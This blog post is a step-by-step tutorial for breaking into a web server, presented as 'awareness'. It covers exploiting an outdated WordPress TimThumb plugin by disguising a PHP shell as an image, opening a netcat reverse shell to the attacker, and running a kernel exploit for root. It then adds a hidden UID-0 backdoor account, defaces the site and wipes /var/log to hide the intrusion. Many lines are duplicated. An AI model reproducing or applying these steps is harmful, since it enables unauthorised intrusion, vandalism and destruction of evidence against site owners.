How Server are Hacked???? Get Aware And Restrict Hackers!!
[Shell Uploading, Rooting, Defacing, Covering your Tracks]
Web-Hacking is a huge topic that I could easily discuss for
hours.
When I had the idea to expand our Blog’s topics (not only
Apple, iPhone, iPad, little tips on Mac and Windows etc….) and add more hacking
information, tutorials etc….
So, today I decided to make a good start by creating this
post-tutorial: How to Hack a Server
Everything you need to know….
Tools you need:
- Hackers OS(Backtrack,Linux based).
- Firefox
- Netcat (Included in Backtrack) If you are on
other linux enviroments get it from
- iCon2PHP
- A good Server Security Analyzer
- A good VPN or Tor.
- Web Vulnerability Scanner
Starting the Main Tutorial:
So, here is the route we will follow:
Find a Vulnerable Website –> Upload a Scipted tool –> Rooting the Server –> Defacing the
Website –> Covering your Tracks
- – - Before we begin – - -
-Boot to O.S.
-Connect to your VPN or to Tor.
-It would be good to read a complete guide to stay anonymous
while hacking
-Open Firefox.
1. Finding a Vulnerable Website and Information about it:
Open and
scan the website (use the standard profile – don’t modify anything except
if you know what you are doing). For this tutorial our website will be: www.xyzz.com (not
very innovative, I know….)
Let’s say we find a vulnerability where we can upload a
remote file and have access to the website’s files.
The Warning should be something like this. It can mention
other information or be a completely other warning too! (Depends on the Vulnerability) What
we need at this tutorial is that we can exploit the ‘File Inclusion Attack’ and
Have access to the Website’s Files. (This is not the warning we need for this
tutorial, but it is related to what we do too.)
OK. Now, we have the site and the path that the
vulnerability is. In our example let’s say it is here:
www.xyzz.com/blog/wp-content/themes/theme_name/thumb.php
The above vulnerability affects WordPress blogs that have
installed certain plugins or themes and haven’t updated to the latest version
of TimThumb, which is a image-editing service on websites.
OK. Scanner should also mention the OS of the Server.
Assuming that ours is a Unix/Linux system (so as to show you how to root
it).
.
2. Uploading the Scipted tool:
Till now, we know:
-The website’s blog has a huge vulnerability at TimThumb.
-It is hosted on a Unix System.
Next, because of the fact that the Vulnerability is located
at an outdated TimThumb version, and timthumb is a service to edit images, we
need to upload the shell instead of the image.
Thus, download any image (I would recommend a small one)
from Google Images. We don’t care what it shows.
Generate Output with iCon2PHP
Copy your Image and your Shell to the Folder that iCon2PHP
is located.
Run the Program and follow the in-program instructions to
build the ‘finalImage.php’.
To avoid any errors while uploading rename the
‘finalImage.php’ to ‘image.php;.png’ (instead of png, type the image
format your image was – jpeg,jpg,gif….) This is the exactly same file but it
confuses the uploader and thinks that it actually is an image.
iCon2PHP Terminal Output:
[...]
Enter the Path of your Image: image.png
Please enter the path to the PHP: GnYshell.php
Please enter the path to the PHP: GnYshell.php
Entered!
Valid Files!
[...]
File: ‘finalImage.php’ has been successfully created at the Current Directory…
[...]
File: ‘finalImage.php’ has been successfully created at the Current Directory…
Upload Output to a Server:
Next, upload your ‘image.php;.png’ at a free server. (000webhost,
0fees etc….)
Go to the vulnerability and type at the URL:
www.xyzz.com/blog/wp-content/themes/theme_name/thumb.php?src=http://flickr.com.domain.0fees.net/image.php;.png
It would be better to create a subdomain like “flickr.com” (or
other big image-hosting service) because sometimes it doesn’t accept
images from other websites.
OK. Your website is shelled. This means that you should now
have your shell uploaded and ready to root the server.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.
You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.
3. Root the Server:
Now that you have shelled your website we can start the
proccess to root the server.
What is rooting when it comes for Server Hacking?
—> Rooting a server is the proccedure when the hacker acquires root priviliges at the whole server. If you don’t understand this yet, I reasure you that by the end of the section “Rooting a server” you will have understood exactly what it is…
—> Rooting a server is the proccedure when the hacker acquires root priviliges at the whole server. If you don’t understand this yet, I reasure you that by the end of the section “Rooting a server” you will have understood exactly what it is…
Let’s procceed to rooting….
Connect via netcat:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:
1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)
2. Open Terminal.
3. Type:
netcat
4. Now type:
-l -n -v -p 402
5.It should have an output like this:
listening on [any] 402 port
6. Now, go to the Back-Connection function at the Shell.
7. Complete with the following:
7. Complete with the following:
Host:YouIPAddress Port: 402 (or the port you
forwarded….)
8. Hit connect and… Voila! Connected to the server!
Downloading and Executing the Kernel exploit:
1. Now, if you type:
whoami
you will see that you are not root yet…
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:
2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. Find kernel exploits
3. Download it to your HDD and then upload it to the server via the Shell. Unzip first, if zipped….
4. Now do the following exploit preparations:
– The most usual types of exploits:
+++ Perl (.pl extension)
+++ C (.c extension)
+++ Perl (.pl extension)
+++ C (.c extension)
(( If the program is in C you have first to compile it by
typing: gcc exploit.c -o exploit ))
– Change the permissions of the exploit:
chmod 777 exploit
chmod 777 exploit
5. Execute the exploit. Type:
./exploit
6. Root permissions acquired! Type this to ensure:
id
or
whoami
7. Add a new root user:
adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1
where root1 is your desired username
where root1 is your desired username
8. Change the password of the new root user:
passwd root1
SUCCESSFULLY ROOTED!
4. Deface the Website:
What is defacing?
Defacing is the proccedure when the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or parse a message to the people or the company (which owns the website…).
Defacing is the proccedure when the hacker uploads his own inbox webpage to alter the homepage of a site. In this way, he can boost his reputation or parse a message to the people or the company (which owns the website…).
Since you got the website shelled, you just create a nice
hacky page in html and
upload it via the Shell as inbox.html (Delete or rename the website’s one…)
5. Cover your tracks:
Till now you were under the anonymity of Tor or ProXPN. You
were very safe. However, in order to ensure that it will be impossible for the
admin to locate you we have to delete logs.
First of all, Unix based-Maschines have some logs that you
have better to either edit or delete.
Common Linux log files name and their usage:
Common Linux log files name and their usage:
/var/log/message: General message and system related stuff
/var/log/auth.log: Authenication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files
/var/log/auth.log: Authenication logs
/var/log/kern.log: Kernel logs
/var/log/cron.log: Crond logs (cron job)
/var/log/maillog: Mail server logs
/var/log/qmail/ : Qmail log directory (more files inside this directory)
/var/log/httpd/: Apache access and error logs directory
/var/log/lighttpd: Lighttpd access and error logs directory
/var/log/boot.log : System boot log
/var/log/mysqld.log: MySQL database server log file
/var/log/secure: Authentication log
/var/log/utmp or /var/log/wtmp : Login records file
/var/log/yum.log: Yum log files
In short /var/log is the location where you should find all
Linux logs file.
To delete all of them by once type:
su root1
rm -rf /var/log
mkdir /var/log
mkdir /var/log
End of this Tutorial.
No comments:
Post a Comment